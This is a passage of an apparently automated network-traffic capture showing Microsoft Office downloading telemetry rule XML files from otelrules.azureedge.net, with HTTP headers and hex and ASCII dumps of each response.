                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                      x-ms-request-id: c2f609cb-201e-0003-75fd-16f85a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185133Z-1657d5bbd48cpbzgkvtewk0wu000000005b0000000011gn0
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:33 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      81192.168.2.74979213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:33 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:33 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:33 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 958
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                      x-ms-request-id: 0c165d1d-a01e-000d-7dfe-16d1ea000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185133Z-1657d5bbd482lxwq1dp2t1zwkc0000000500000000014cp8
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:33 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      82192.168.2.74979413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:33 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:33 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:33 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 2592
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                      x-ms-request-id: 33b4d0ae-a01e-0032-35ff-161949000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185133Z-1657d5bbd48sdh4cyzadbb3748000000057g00000000er5h
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:33 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      83192.168.2.74979713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:34 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:34 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:34 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1393
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                      x-ms-request-id: 8a5fd43d-c01e-0066-4506-17a1ec000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185134Z-1657d5bbd48qjg85buwfdynm5w00000005eg00000000ktyw
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:34 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      84192.168.2.74979513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:34 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:34 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:34 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 3342
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                      x-ms-request-id: 960edd56-701e-005c-4100-17bb94000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185134Z-1657d5bbd48vlsxxpe15ac3q7n00000005bg00000000gxu9
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:34 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      85192.168.2.74979613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:34 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:34 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:34 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 2284
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                      x-ms-request-id: b738acd5-401e-0067-1502-1709c2000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185134Z-1657d5bbd48cpbzgkvtewk0wu000000005cg00000000vw6f
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:34 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      86192.168.2.74979813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:34 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:34 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:34 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1356
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                      x-ms-request-id: 0480ed94-801e-00ac-5102-17fd65000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185134Z-1657d5bbd48q6t9vvmrkd293mg000000059g00000000rbhw
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:34 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      87192.168.2.74979913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:34 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:34 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:34 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1393
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                      ETag: "0x8DC582BE39DFC9B"
                                                                                                      x-ms-request-id: b72ef555-401e-0067-78fe-1609c2000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185134Z-1657d5bbd48brl8we3nu8cxwgn00000005ng00000000suag
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:34 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      88192.168.2.74980213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:34 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:35 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:34 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1358
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                      x-ms-request-id: 84e7aa3f-c01e-008e-74ff-167381000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185134Z-1657d5bbd48cpbzgkvtewk0wu000000005ag000000014yte
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:35 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      89192.168.2.74980113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:34 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:35 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:34 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1395
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                      ETag: "0x8DC582BE017CAD3"
                                                                                                      x-ms-request-id: cb759915-201e-003f-5f03-176d94000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185134Z-1657d5bbd482tlqpvyz9e93p5400000005g000000000a0fm
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:35 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      90192.168.2.74980013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:34 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:35 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:34 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1356
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                      ETag: "0x8DC582BDF66E42D"
                                                                                                      x-ms-request-id: db28c537-d01e-0065-47fe-16b77a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185134Z-1657d5bbd48sqtlf1huhzuwq70000000052000000000r28r
                                                                                                      x-fd-int-roxy-purgeid: 0
